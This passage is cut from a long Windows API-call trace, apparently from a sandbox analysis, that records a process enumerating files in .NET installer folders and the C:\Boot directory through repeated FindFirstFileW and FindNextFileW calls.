ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0196.089] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0196.089] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0196.089] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0196.089] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0196.089] FindClose (in: hFindFile=0x604938 | out: hFindFile=0x604938) returned 1 [0197.193] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.193] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x0, dwReserved1=0x240000, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0197.193] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0197.193] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0197.194] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0197.194] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0197.194] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0197.194] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0197.195] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0197.195] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x0, dwReserved1=0x240000, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0197.195] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x0, dwReserved1=0x240000, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0197.195] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0197.195] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0197.196] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0197.196] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0197.196] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0197.196] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0197.196] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0197.196] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0197.196] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x0, dwReserved1=0x240000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0197.197] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x0, dwReserved1=0x240000, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0197.197] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0197.197] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0197.197] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0197.197] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0197.197] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0197.197] FindClose (in: hFindFile=0x6047f8 | out: hFindFile=0x6047f8) returned 1 [0197.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4011288 | out: hHeap=0x5e0000) returned 1 [0197.198] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0197.198] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x604938 [0197.199] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0197.199] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xac3efa99, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xac3efa99, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD", cAlternateFileName="")) returned 1 [0197.200] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0197.200] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0197.200] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0197.200] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0197.200] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604678 [0197.201] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.201] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.201] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.201] FindClose (in: hFindFile=0x604678 | out: hFindFile=0x604678) returned 1 [0197.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.201] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0197.201] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0197.201] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0197.202] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: 